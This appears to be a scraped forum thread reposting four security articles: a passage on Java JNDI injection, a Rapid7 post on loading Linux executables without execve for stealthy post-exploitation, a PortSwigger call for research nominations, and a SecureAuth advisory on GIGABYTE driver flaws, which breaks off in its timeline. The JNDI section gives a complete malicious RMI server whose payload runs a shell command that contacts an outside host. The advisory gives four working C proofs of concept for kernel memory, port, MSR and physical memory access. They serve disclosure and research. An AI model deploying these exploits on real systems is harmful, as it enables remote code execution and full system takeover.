@param obj The reference object describing the Bean */ @Override public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable environment) throws NamingException { if (obj instanceof ResourceRef) { try { Reference ref = (Reference) obj; String beanClassName = ref.getClassName(); Class beanClass = null; ClassLoader tcl = Thread.currentThread().getContextClassLoader(); if (tcl != null) { try { beanClass = tcl.loadClass(beanClassName); } catch(ClassNotFoundException e) { } } else { try { beanClass = Class.forName(beanClassName); } catch(ClassNotFoundException e) { e.printStackTrace(); } } ... BeanInfo bi = Introspector.getBeanInfo(beanClass); PropertyDescriptor[] pda = bi.getPropertyDescriptors(); Object bean = beanClass.getConstructor().newInstance(); /* Look for properties with explicitly configured setter */ RefAddr ra = ref.get("forceString"); Map forced = new HashMap<>(); String value; if (ra != null) { value = (String)ra.getContent(); Class paramTypes[] = new Class[1]; paramTypes[0] = String.class; String setterName; int index; /* Items are given as comma separated list */ for (String param: value.split(",")) { param = param.trim(); /* A single item can either be of the form name=method * or just a property name (and we will use a standard * setter) */ index = param.indexOf('='); if (index >= 0) { setterName = param.substring(index + 1).trim(); param = param.substring(0, index).trim(); } else { setterName = "set" + param.substring(0, 1).toUpperCase(Locale.ENGLISH) + param.substring(1); } try { forced.put(param, beanClass.getMethod(setterName, paramTypes)); } catch (NoSuchMethodException|SecurityException ex) { throw new NamingException ("Forced String setter " + setterName + " not found for property " + param); } } } Enumeration e = ref.getAll(); while (e.hasMoreElements()) { ra = e.nextElement(); String propName = ra.getType(); if (propName.equals(Constants.FACTORY) || propName.equals("scope") || propName.equals("auth") || propName.equals("forceString") || propName.equals("singleton")) { continue; } value = (String)ra.getContent(); Object[] valueArray = new Object[1]; /* Shortcut for properties with explicitly configured setter */ Method method = forced.get(propName); if (method != null) { valueArray[0] = value; try { method.invoke(bean, valueArray); } catch (IllegalAccessException| IllegalArgumentException| InvocationTargetException ex) { throw new NamingException ("Forced String setter " + method.getName() + " threw exception for property " + propName); } continue; } ... The "BeanFactory" class creates an instance of arbitrary bean and calls its setters for all properties. The target bean class name, attributes, and attribute's values all come from the Reference object, which is controlled by an attacker. The target class should have a public no-argument constructor and public setters with only one "String" parameter. In fact, these setters may not necessarily start from 'set..' as "BeanFactory" contains some logic surrounding how we can specify an arbitrary setter name for any parameter. /* Look for properties with explicitly configured setter */ RefAddr ra = ref.get("forceString"); Map forced = new HashMap<>(); String value; if (ra != null) { value = (String)ra.getContent(); Class paramTypes[] = new Class[1]; paramTypes[0] = String.class; String setterName; int index; /* Items are given as comma separated list */ for (String param: value.split(",")) { param = param.trim(); /* A single item can either be of the form name=method * or just a property name (and we will use a standard * setter) */ index = param.indexOf('='); if (index >= 0) { setterName = param.substring(index + 1).trim(); param = param.substring(0, index).trim(); } else { setterName = "set" + param.substring(0, 1).toUpperCase(Locale.ENGLISH) + param.substring(1); } The magic property used here is "forceString". By setting it, for example, to "x=eval", we can make a method call with name 'eval' instead of 'setX', for the property 'x'. So, by utilising the "BeanFactory" class, we can create an instance of arbitrary class with default constructor and call any public method with one "String" parameter. One of the classes that may be useful here is "javax.el.ELProcessor". In its "eval" method, we can specify a string that will represent a Java expression language template to be executed. package javax.el; ... public class ELProcessor { ... public Object eval(String expression) { return getValue(expression, Object.class); } And here is a malicious expression that executes arbitrary command when evaluated: {"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','nslookup jndi.s.artsploit.com']).start()")} Chaining all things together After the patch, there is almost no difference between LDAP and RMI for exploitation purposes, so for simplicity we will use RMI. We are writing our own malicious RMI server that responds with a crafted "ResourceRef" object: import java.rmi.registry.*; import com.sun.jndi.rmi.registry.*; import javax.naming.*; import org.apache.naming.ResourceRef; public class EvilRMIServerNew { public static void main(String[] args) throws Exception { System.out.println("Creating evil RMI registry on port 1097"); Registry registry = LocateRegistry.createRegistry(1097); //prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null); //redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code ref.add(new StringRefAddr("forceString", "x=eval")); //expression language to execute 'nslookup jndi.s.artsploit.com', modify /bin/sh to cmd.exe if you target windows ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','nslookup jndi.s.artsploit.com']).start()\")")); ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref); registry.bind("Object", referenceWrapper); } } This server responds with a serialized object of 'org.apache.naming.ResourceRef', with all crafted attributes to trigger the desired behaviour on the client. Then we trigger JNDI resolution on the victim Java process: new InitialContext().lookup("rmi://127.0.0.1:1097/Object") Nothing undesirable will happen when this object is deserialised. But since it still extends "javax.naming.Reference", the "org.apache.naming.factory.BeanFactory" factory will be used on the victim's side to get the 'real' object from the Reference. At this stage, a remote code execution via template evaluation will be triggered and the 'nslookup jndi.s.artsploit.com' command will be executed. The only limitation here is that the target Java application should have an "org.apache.naming.factory.BeanFactory" class from the Apache Tomcat Server in the classpath, but other application servers may have their own object factories with the dangerous functionality inside. Solution: The actual problem here is not within the JDK or Apache Tomcat library, but rather in custom applications that pass user-controllable data to the "InitialContext.lookup()" function, as it still represents a security risk even in fully patched JDK installations. Keep in mind that other vulnerabilities (such as 'Deserialisation of untrusted data' for example) may also lead to JNDI resolution in many cases. Preventing these vulnerabilities by using a source code review is always a good idea. Sursa: https://www.veracode.com/blog/research/exploiting-jndi-injections-java
-
- 1
-
-
Santa's ELFs: Running Linux Executables Without execve Adam Cammack Jan 03, 2019 7 min read This blog is the 11th post in our annual 12 Days of HaXmas blog series. Merry HaXmas! Now that the holidays are winding down, Santa's elves can finally get some much-needed rest after working tirelessly on dolls, wooden trains, and new copies of Fortnite. Santa's ELFs, however, do not get such a break, since the Executable and Linkable Format (ELF) is the base of numerous Unix-like operating systems such as Linux, most modern BSDs, and Solaris. ELF files are capable of many tricks, like those we use in our *nix Meterpreter implementation, but those tricks require building each executable either with our special toolchain or GCC 8+ with the new -static-pie flag. What if things were different? The kernel doesn't need a file on disk to load and run code, even if it makes us have one. Surely with some HaXmas magic and elbow grease we can do it ourselves. Handcrafted mirrors Perhaps the most-desired trick for executable formats is reflective loading. Reflective loading is an important post-exploitation technique used to avoid detection and execute more complex tools in locked-down environments. It generally has three broad steps: Get code execution (e.g., exploitation or phishing) Grab your own code from somewhere Convince the operating system to run your code without loading it like a normal process That last part is what makes reflective loading desirable. Environments are increasingly locked down, and the components of a normal process start are the most obvious targets. Traditional antivirus scans things on the disk, code signing checks integrity as new processes start, and behavioral monitoring keeps checking to make sure none of those processes start doing anything too weird. The thought is, if attackers can't run any programs, they can't do anything and the system is secure. This is not entirely correct; blocking the most obvious paths just makes things painful. In particular, Windows, which uses the Portable Executable (PE) format, has seen much research into this topic, both because it is widely deployed and because it has useful reflection building blocks built into the core operating system. In fact, it has the gold standard API for this sort of work, CreateRemoteThread and friends, which allows attackers to not merely load, but inject code into other running processes. Despite lacking fun APIs for reflective injection like CreateRemoteThread found in Windows, the last few years have seen some interesting research in unorthodox ways to use developer-focused Linux features to make their own security-focused lives better. A good summary of command-only approaches can be found here, and other techniques that require helper files include tools such as linux-inject. A more modern technique that can be executed from a helper binary or scripting language uses some new-ish sycalls. These approaches on Linux can be grouped into five categories: Writing to temporary files: This is not too different from typical code, but it doesn't leave disk artifacts. Injecting with ptrace: This requires some sophistication to control and classically allows broad process-hopping. Self-modifying executables: dd is a classic for this, and it requires a bit of fineness and customized shellcode. FFI integration in scripting languages: Python and Ruby are both suitable, current techniques that only load shellcode. Creating non-filesystem temporary files: This uses syscalls added in 2014, so it's approaching broad usability. Strict working conditions Few people closely watch their Linux boxes (congratulations if you do!), but these technique styles have security/opsec considerations in addition to their respective technical challenges alluded to above. If you are on the bluer end of the security spectrum, think of the following as ways to frustrate any remote attackers lucky enough to compromise something: Temporary files It is increasingly common to find /tmp and /dev/shm mounted noexec (that is, no file in that tree can be executed), especially on mobile and embedded systems. Speaking of embedded systems, those often have read-only persistent file storage as well, so you can't even fall back to hoping no one is looking at the disk. Self-modifying executables and ptrace Access to ptrace and most of fun introspection in /proc/<PID> is governed by the kernel.yama.ptrace_scope sysctl variable. On boxes that are not being used for development, it should be set to at least 2 to remove access from non-privileged users. This is default on many mobile and embedded systems, and modern desktop/server distros default to at least 1, which reduces its usefulness for wildly hopping across processes. Also, it's Linux-specific, so no sweet, sweet BSD shells for you. FFI integrations Ruby's fiddle and Python's ctypes specifically are very flexible and for a lot of small things can function like an interpreted C. They don't have an assembler, though, so any detail work with registers or bootstrapping into different executables will need done with shellcode from your end. You also never know which version, if any, is going to be installed on a given system. Non-filesystem temporary files Also Linux-specific, this calls a pair of new syscalls that together can bypass any noexec flags I have been able to muster (tested through kernel 4.19.10). The first syscall is memfd_create(2). Added in 3.17, it allocates a new temporary filesystem with default permissions and creates a file inside that that does not show up in any mounted filesystem except /proc. The second syscall, added in 3.19, is execveat(2). It can take a file descriptor and pass it to the kernel for execution. The downside is that the created file can easily be found with find /proc/*/fd -lname '/memfd:*', since all the memfd_create(2) files are represented as symbolic links with constant prefix. This feature in particular is rarely used in common software—the only legitimate example I can find on my Linux boxen was added to PulseAudio in 2016. A (runtime) linker to the past And then there's big bottleneck: To run other programs, all these techniques use the standard execve(2) (or the related execveat(2) call in that last case). The presence of tailored SELinux profiles or syscall auditing could easily render them off-limits, and on recent SELinux-enforcing Android builds, it does. There is another technique called userland exec or ul_exec; however, that mimics how the kernel initializes a process during an execve and handing control off to runtime linker: ld.so(8). This is one of the earliest techniques in this field, pioneered by the grugq, though it's never been much pursued because it is a bit fiddly compared to the techniques above. There was an update and rewrite for x86_64, but it implements its own standard library, making it difficult to extend and unable to compile with modern stack-smashing protection. The Linux world is very different from what it was nearly 15 years ago when this technique was first published. In the modern day, with 40+ bits of address space and position-independent executables by default, cobbling together the execve process is more straightforward. Sure, we can't hardcode the stack address and have it work >90% of the time, but programs don't rely on it being constant anymore, either, so we can put it nearly wherever and do less juggling with memory addresses. Linux environments are now also more common, valuable, and closely guarded than in 2004, so going through the effort is worth it in some scenarios. Process There are still two requirements for emulating the work of execve that are not a given all the time, depending on execution method and environment. First, we require page-aligned memory allocation and the ability to mark the memory executable after we populate it. Because it is required for JITs, the built-in library loader dlopen(3), and some DRM implementations, it is difficult to completely remove from a system. However, SELinux can restrict executable memory allocation, and some more self-contained platforms like Android use these restrictions to good effect on things that are not approved browsers or DRM libraries. Next, we require the ability to arbitrarily jump into said memory. Trivial in C or shellcode, it does requires a full FFI interface in a scripting language and rules out a non-XS Perl implementation, for example. The process detailed by grugq has changed in subtle but interesting ways. Even with all the development that has taken place, the overall steps are the same as before. One security feature of the modern GNU/Linux userland is that it is less concerned with particular memory addresses, which gives us more flexibility to implement our other kind of security feature. There are also more hints that the kernel passes to the runtime in the auxiliary vector and finding the original is now more desirable, but most programs can work fine with a simple one on most architectures. The tool The downfall of many tools, especially in open source and security, is staleness. With execve emulation left aside for other loading methods, the two ul_exec implementations have gotten little interest and (as best as I can tell) few updates from their authors. Our Linux Meterpreter implementation currently lacks support for the popular -m option to the execute command that on Windows runs a process completely in-memory under the guise of a benign program. Using this and a fallback technique or two from above would give us the capabilities that we need to run uploaded files from memory and with a little trickery, such as mapping extra benign files or changing the process name before handing control over to the uploaded executable, completely replicate -m. A nice side effect is that this will also make building and distributing plugins easier, as they will no longer need to be made into a memory image at build time. To enable this, I am creating a shared library that will live alongside our Linux Meterpreter, mettle. It won't depend on any of the Meterpreter code, but by default, it will build with its toolchain. It will also be free and packageable into whatever post-exploitation mechanism you desire. Be sure to check out the pull request if you have any questions or suggestions. Here we can see an example tool that uses this library in action as viewed through the microscope of the syscall tracer strace(1). To avoid all the output associated with normal tracing, we are just using the %process trace expression to view only calls associated with the process life cycle like fork, execve, and exit. On x86_64, the %process expression also grabs the arch_prctl syscall, which is only used on x86_64 and only for setting up thread-local storage. The execve is from strace starting the executable, and the first pair of arch_prctl calls is from the library initialization. Then nothing until the target library starts up with its own pair of arch_prctl calls and prints out our message. $ strace -e trace=%process ./noexec $(which cat) haxmas.txt execve("./noexec", ["./noexec", "/usr/bin/cat", "haxmas.txt"], 0x7ffdcbdf0bc0 /* 23 vars */) = 0 arch_prctl(0x3001 /* ARCH_??? */, 0x7fffa750dd20) = -1 EINVAL (Invalid argument) arch_prctl(ARCH_SET_FS, 0x7f17ca7db540) = 0 arch_prctl(0x3001 /* ARCH_??? */, 0x7fffa750dd20) = -1 EINVAL (Invalid argument) arch_prctl(ARCH_SET_FS, 0x7f17ca7f3540) = 0 Merry, HaXmas! exit_group(0) = ? +++ exited with 0 +++ Putting a bow on it With this new library part of Mettle, we hope to provide a long-term, stealthy way of reliably loading programs on compromised Linux boxes. If you have questions or suggestions, be sure to check out out the progress of my pull request, our *nix payload, or join us on Slack. Sursa: https://blog.rapid7.com/2019/01/03/santas-elfs-running-linux-executables-without-execve/
-
- 2
-
-
Top 10 web hacking techniques of 2018 - nominations open James Kettle | 03 January 2019 at 14:43 UTC Nominations are now open for the top 10 new web hacking techniques of 2018. Every year countless security researchers share their findings with the community. Whether they're elegant attack refinements, empirical studies, or entirely new techniques, many of them contain innovative ideas capable of inspiring new discoveries long after publication. And while some inevitably end up on stage at security conferences, others are easily overlooked amid a sea of overhyped disclosures, and doomed to fade into obscurity. As such, each year we call upon the community to help us seek out, distil, and preserve the very best new research for future readers. As with last year, we’ll do this in three phases: Jan 1st: Start to collect community nominations Jan 21st: Launch community vote to build shortlist of top 15 Feb 11th: Panel vote on shortlist to select final top 10 Last year we decided to prevent conflicts of interest by excluding PortSwigger research, but found the diverse voting panel meant we needed a better system. We eventually settled on disallowing panelists from voting on research they’re affiliated with, and adjusting the final scores to compensate. This approach proved fair and effective, so having checked with the community we'll no longer exclude our own research. To nominate a piece of research, either use this form or reply to this Twitter thread. Feel free to make multiple nominations, and nominate your own research, etc. It doesn't matter whether the submission is a blog post, whitepaper, or presentation recording - just try to submit the best format available. If you want, you can take a look at past years’ top 10 to get an idea for what people feel constitutes great research. You can find previous year's results here: 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016/17. Nominations so far Here are the nominations so far. We're making offline archives of them all as we go, so we can replace any that go missing in future. I'll do a basic quality filter before the community vote starts. How I exploited ACME TLS-SNI-01 issuing Let’s Encrypt SSL-certs for any domain using shared hosting Kicking the Rims - A Guide for Securely Writing and Auditing Chrome Extensions | The Hacker Blog EdOverflow | An analysis of logic flaws in web-of-trust services. OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies PowerPoint Presentation - OWASP_AppSec_EU18_WordPress.pdf Scratching the surface of host headers in Safari RCE by uploading a web.config – 003Random’s Blog Security: HTTP Smuggling, Apsis Pound load balancer | RBleug Piercing the Veil: Server Side Request Forgery to NIPRNet access inputzero: A bug that affects million users - Kaspersky VPN | Dhiraj Mishra inputzero: Telegram anonymity fails in desktop - CVE-2018-17780 | Dhiraj Mishra inputzero: An untold story of skype by microsoft | Dhiraj Mishra Neatly bypassing CSP – Wallarm Large-Scale Analysis of Style Injection by Relative Path Overwrite - www2018rpo_paper.pdf Beyond XSS: Edge Side Include Injection :: GoSecure GitHub - HoLyVieR/prototype-pollution-nsec18: Content released at NorthSec 2018 for my talk on prototype pollution Logically Bypassing Browser Security Boundaries - Speaker Deck Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out James Kettle @albinowax Sursa: https://portswigger.net/blog/top-10-web-hacking-techniques-of-2018-nominations-open
-
- 3
-
-
GIGABYTE Drivers Elevation of Privilege Vulnerabilities 1. Advisory Information Title: GIGABYTE Drivers Elevation of Privilege Vulnerabilities Advisory ID: CORE-2018-0007 Advisory URL: http://www.secureauth.com/labs/advisories/gigabyte-drivers-elevation-privilege-vulnerabilities Date published: 2018-12-18 Date of last update: 2018-12-18 Vendors contacted: Gigabyte Release mode: User release 2. Vulnerability Information Class: Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782] Impact: Code execution Remotely Exploitable: No Locally Exploitable: Yes CVE Name: CVE-2018-19320, CVE-2018-19322, CVE-2018-19323, CVE-2018-19321 3. Vulnerability Description GIGABYTE's website states that[1]: Founded in 1986, GIGABYTE is committed to providing top-notch solutions that "upgraded your life". We are regarded as a pioneer in innovation with groundbreaking excitements such as Ultra Durable, WINDFORCE, and BRIX series. We have also invented a premium gaming brand AORUS, a full spectrum of gaming products for gamers and enthusiast. GIGABYTE has continuously brought unique new ways of digital world and created marvelous products that empower you with meaningful and charming experiences. Multiple vulnerabilities were found in the GPCIDrv and GDrv drivers as bundled with several GIGABYTE and AORUS branded motherboard and graphics card utilities, which could allow a local attacker to elevate privileges. 4. Vulnerable Packages GIGABYTE APP Center v1.05.21 and previous AORUS GRAPHICS ENGINE v1.33 and previous XTREME GAMING ENGINE v1.25 and previous OC GURU II v2.08 Other products and versions might be affected, but they were not tested. 5. Vendor Information, Solutions and Workarounds The vendor did not provide fixes or workaround information. 6. Credits These vulnerabilities were discovered and researched by Diego Juarez. The publication of this advisory was coordinated by Leandro Cuozzo from SecureAuth Advisories Team. 7. Technical Description / Proof of Concept Code GYGABYTE App Center, RGBFusion, Xtreme Engine, AORUS Graphics Engine, etc. use low level drivers to program and query the status on several embedded ICs on their hardware. Fan curves, clock frequencies, LED colors, thermal performance, and other user customizable properties and monitoring functionality are exposed to applications through these low level kernel drivers. The main subject of this advisory are two of the device drivers installed/loaded by affected GIGABYTE utilities (GPCIDrv and GDrv). From now on addressed as "GPCI" and "GIO". Default installation allows non-privileged user processes (even running at LOW INTEGRITY) to get a HANDLE and issue IOCTL codes to these drivers. The following sections describe the problems found. 7.1. Arbitrary ring0 VM read/write [CVE-2018-19320] There is ring0 memcpy-like functionality built into GIO's IOCTL 0xC3502808, allowing a local attacker to take complete control of the affected system. Proof of Concept: // GIGABYTE PoC demonstrating non-pivileged R/W access to abritrary virtual memory #include <windows.h> #include <stdio.h> #define IOCTL_GIO_MEMCPY 0xC3502808 HANDLE ghDriver = 0; #pragma pack (push,1) typedef struct _GIO_MemCpyStruct { ULONG64 dest; ULONG64 src; DWORD size; } GIO_MemCpyStruct; #pragma pack(pop) BOOL GIO_memcpy(ULONG64 dest, ULONG64 src, DWORD size) { GIO_MemCpyStruct mystructIn = { dest, src, size}; BYTE outbuffer[0x30] = { 0 }; DWORD returned = 0; DeviceIoControl(ghDriver, IOCTL_GIO_MEMCPY, (LPVOID)&mystructIn, sizeof(mystructIn), (LPVOID)outbuffer, sizeof(outbuffer), & returned, NULL); if (returned) { return TRUE; } return FALSE; } BOOL InitDriver() { char szDeviceNames[] = "\\\\.\\GIO"; ghDriver = CreateFile(szDeviceNames, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (ghDriver == INVALID_HANDLE_VALUE) { printf("Cannot get handle to driver \'%s\' - GetLastError:%d\n", szDeviceNames, GetLastError()); return FALSE; } return TRUE; } int main(int argc, char* argv[]) { if (!InitDriver()) { exit(0); } printf("GIGABYTE PoC (arbitrary ring0 write) - pnx!/CORE\n"); printf("press ENTER for instant BSOD\n"); getchar(); ULONG64 data = 0xFFFF1111FFFF2222; GIO_memcpy(0, (ULONG64)&data, 8); CloseHandle(ghDriver); return 0; } 7.2. Port mapped I/O access [CVE-2018-19322] Both GPCI and GIO expose functionality to read/write data from/to IO ports. This could be leveraged in a number of ways to ultimately run code with elevated privileges. Proof of Concept: // GIGABYTE PoC demonstrating non-privileged access to IO ports // This harmless PoC only reboots the PC, much more sinister stuff // would also be possible by abusing this functionality. #include <windows.h> #include <stdio.h> // for \\.\GPCIDrv64 #define IOCTL_GPCIDRV_PORTREADB 0x9C402588 #define IOCTL_GPCIDRV_PORTWRITEB 0x9C40258C // for \\.\GIO #define IOCTL_GIO_PORTREADB 0x0C3506404 #define IOCTL_GIO_PORTWRITEB 0x0C350A440 HANDLE ghDriver = 0; typedef BYTE(*fnPMIOReadB)(WORD port); typedef BYTE(*fnPMIOWriteB)(WORD port, BYTE value); #pragma pack (push,1) typedef struct { DWORD DriverIndex; // DriverEnum index BYTE DeviceName[MAX_PATH]; fnPMIOReadB pPMIOReadB; fnPMIOWriteB pPMIOWriteB; } AutoConfigStruct; AutoConfigStruct gConfig = { 0 }; enum DriverEnum { GPCIDrv64 = 1, GIO, }; typedef struct _GPCIDRV_PORTIO_STRUCT { DWORD port; ULONG64 value; } GPCIDRV_PORTIO_STRUCT; #pragma pack(pop) #define IOCTLMACRO(iocontrolcode, size) \ BYTE outbuffer[0x30] = { 0 }; \ DWORD returned = 0; \ DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \ return outbuffer[0]; \ BYTE GPCIDrv_PMIOReadB(WORD port) { GPCIDRV_PORTIO_STRUCT inbuffer = { port, 0}; IOCTLMACRO(IOCTL_GPCIDRV_PORTREADB, 10) } BYTE GPCIDrv_PMIOWriteB(WORD port, BYTE value) { GPCIDRV_PORTIO_STRUCT inbuffer = { port, value}; IOCTLMACRO(IOCTL_GPCIDRV_PORTWRITEB, 10) } BYTE GIO_PMIOReadB(WORD port) { GPCIDRV_PORTIO_STRUCT inbuffer = { port, 0 }; IOCTLMACRO(IOCTL_GIO_PORTREADB, 4) } BYTE GIO_PMIOWriteB(WORD port, BYTE value) { GPCIDRV_PORTIO_STRUCT inbuffer = { port, value }; IOCTLMACRO(IOCTL_GIO_PORTWRITEB, 5) } void Reboot() { BYTE cf9 = gConfig.pPMIOReadB(0xcf9) & ~0x6; gConfig.pPMIOWriteB(0xcf9, cf9 | 2); Sleep(50); gConfig.pPMIOWriteB(0xcf9, cf9 | 0xe); Sleep(50); } BOOL InitDriver() { char *szDeviceNames[] = { "\\\\.\\GPCIDrv64" , "\\\\.\\GIO" }; BYTE i = 0; for (i = 0; i < 2; i++) { ghDriver = CreateFile(szDeviceNames[i], GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (ghDriver == INVALID_HANDLE_VALUE) { printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceNames[i], GetLastError()); continue; } gConfig.DriverIndex = i+1; memcpy(gConfig.DeviceName, szDeviceNames[i], MAX_PATH-1); break; } switch (gConfig.DriverIndex) { case DriverEnum::GPCIDrv64: { gConfig.pPMIOReadB = (fnPMIOReadB)GPCIDrv_PMIOReadB; gConfig.pPMIOWriteB = (fnPMIOWriteB)GPCIDrv_PMIOWriteB; } break; case DriverEnum::GIO: { gConfig.pPMIOReadB = (fnPMIOReadB)GIO_PMIOReadB; gConfig.pPMIOWriteB = (fnPMIOWriteB)GIO_PMIOWriteB; } break; default: break; } return gConfig.DriverIndex ? TRUE : FALSE; } int main(int argc, char* argv[]) { printf("GIGABYTE PoC (PMIO access) - pnx!/CORE\n"); if (!InitDriver()) { printf("InitDriver failed! - aborting...\n"); exit(0); } printf("DeviceName: \'%s\' Handle: %08x\n", gConfig.DeviceName, (DWORD)ghDriver); Reboot(); return CloseHandle(ghDriver); } 7.3. MSR Register access [CVE-2018-19323] GIO exposes functionality to read and write Machine Specific Registers (MSRs). This could be leveraged to execute arbitrary ring-0 code. Proof of Concept: // GIGABYTE GIO driver PoC demonstrating non-privileged access to MSR registers // This PoC demonstrates non privileged MSR access by reading // IA32_LSTAR value (leaks a kernel function pointer bypassing KASLR) // and then writing garbage to it (instant BSOD!) #include <windows.h> #include <stdio.h> #define IOCTL_GIO_MSRACCESS 0x0C3502580 HANDLE ghDriver = 0; #pragma pack (push,1) typedef struct _GIO_MSRIO_STRUCT { DWORD rw; // 0 read - 1 write DWORD reg; // ULONG64 value; // } GIO_MSRIO_STRUCT; #pragma pack(pop) #define IOCTLMACRO(iocontrolcode, size) \ DWORD returned = 0; \ DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \ return outbuffer[1]; \ ULONG64 GIO_RDMSR(DWORD reg) { ASIO_MSRIO_STRUCT inbuffer = { 1, reg }; ULONG64 outbuffer[2] = { 0 }; IOCTLMACRO(IOCTL_GIO_MSRACCESS, 16) } ULONG64 GIO_WRMSR(DWORD reg, ULONG64 value) { ASIO_MSRIO_STRUCT inbuffer = { 0, reg, value }; ULONG64 outbuffer[2] = { 0 }; IOCTLMACRO(IOCTL_GIO_MSRACCESS, 16) } BOOL InitDriver() { char szDeviceName[] = "\\\\.\\GIO"; ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (ghDriver == INVALID_HANDLE_VALUE) { printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError()); return FALSE; } return TRUE; } int main(int argc, char* argv[]) { printf("GIGABYTE PoC (MSR access) - pnx!/CORE\n"); if (!InitDriver()) { printf("InitDriver failed! - aborting...\n"); exit(0); } ULONG64 a = GIO_RDMSR(0xC0000082); printf("IA322_LSTAR: %llx (nt!KiSystemCall64)\n", a); printf("press ENTER for instant BSOD\n"); getchar(); a = GIO_WRMSR(0xC0000082, 0xffff1111ffff2222); return CloseHandle(ghDriver); } 7.4. Arbitrary physical memory read/write [CVE-2018-19321] Both GPCI and GIO expose functionality to read/write arbitrary physical memory, allowing a local attacker to take complete control of the affected system. Proof of Concept: // GIGABYTE PoC (arbitrary physical memory read/write) #include <windows.h> #include <stdio.h> #define IOCTL_GIO_MAPPHYSICAL 0xC3502004 #define IOCTL_GIO_UNMAPPHYSICAL 0xC3502008 #define IOCTL_GPCI_MAPPHYSICAL 0x9C402580 #define IOCTL_GPCI_UNMAPPHYSICAL 0x9C402584 HANDLE ghDriver = 0; typedef ULONG64(*fnMapPhysical)(ULONG64 physicaladdress); typedef ULONG64(*fnUnMapPhysical)(ULONG64 address); #pragma pack (push,1) typedef struct _GIO_PHMAP { DWORD InterfaceType; DWORD Bus; ULONG64 PhysicalAddress; DWORD IOSpace; DWORD size; } GIO_PHMAP; typedef struct _GPCI_PHMAP { DWORD PhysicalAddress; DWORD size; } GPCI_PHMAP; typedef struct { DWORD DriverIndex; // DriverEnum index BYTE DeviceName[MAX_PATH]; fnMapPhysical pMapPhysical; fnUnMapPhysical pUnMapPhysical; } AutoConfigStruct; AutoConfigStruct gConfig = { 0 }; enum DriverEnum { GPCIDrv64 = 1, GIO, }; #pragma pack(pop) #define IOCTLMACRO(iocontrolcode) \ ULONG64 outbuffer[2] = { 0 }; \ DWORD returned = 0; \ DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, sizeof(inbuffer), (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \ return outbuffer[0]; \ ULONG64 GIO_mapPhysical(ULONG64 physicaladdress) { GIO_PHMAP inbuffer = { 0, 0, physicaladdress, 0, 0x1000}; IOCTLMACRO(IOCTL_GIO_MAPPHYSICAL) } ULONG64 GIO_unmapPhysical(ULONG64 address) { ULONG64 inbuffer = address; IOCTLMACRO(IOCTL_GIO_UNMAPPHYSICAL) } ULONG64 GPCI_mapPhysical(DWORD physicaladdress) { GPCI_PHMAP inbuffer = { physicaladdress, 0x1000}; IOCTLMACRO(IOCTL_GPCI_MAPPHYSICAL) } ULONG64 GPCI_unmapPhysical(ULONG64 address) { ULONG64 inbuffer = address; IOCTLMACRO(IOCTL_GPCI_UNMAPPHYSICAL) } BOOL InitDriver() { char *szDeviceNames[] = { "\\\\.\\GPCIDrv64" , "\\\\.\\GIO" }; BYTE i = 0; for (i = 0; i < 2; i++) { ghDriver = CreateFile(szDeviceNames[i], GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (ghDriver == INVALID_HANDLE_VALUE) { printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceNames[i], GetLastError()); continue; } gConfig.DriverIndex = i + 1; memcpy(gConfig.DeviceName, szDeviceNames[i], MAX_PATH - 1); break; } switch (gConfig.DriverIndex) { case DriverEnum::GPCIDrv64: { gConfig.pMapPhysical = (fnMapPhysical)GPCI_mapPhysical; gConfig.pUnMapPhysical = (fnUnMapPhysical)GPCI_unmapPhysical; } break; case DriverEnum::GIO: { gConfig.pMapPhysical = (fnMapPhysical)GIO_mapPhysical; gConfig.pUnMapPhysical = (fnUnMapPhysical)GIO_unmapPhysical; } break; default: break; } return gConfig.DriverIndex ? TRUE : FALSE; } int main(int argc, char * argv[]) { if (!InitDriver()) { exit(0); } printf("GIGABYTE PoC (arbitrary physical memory read/write) - pnx!/CORE\n"); printf("press ENTER for System CRASH\n"); getchar(); printf("Bruteforcing"); for (unsigned int i = 0; i < 0xffffffff; i+=0x1000) { printf("."); ULONG64 mappedVA = gConfig.pMapPhysical(i); *(ULONG64 *)mappedVA = 0xCCCCCCCCCCCCCCCC; gConfig.pUnMapPhysical(mappedVA); } CloseHandle(ghDriver); return 0; } 8. Report Timeline 2018-04-24: SecureAuth 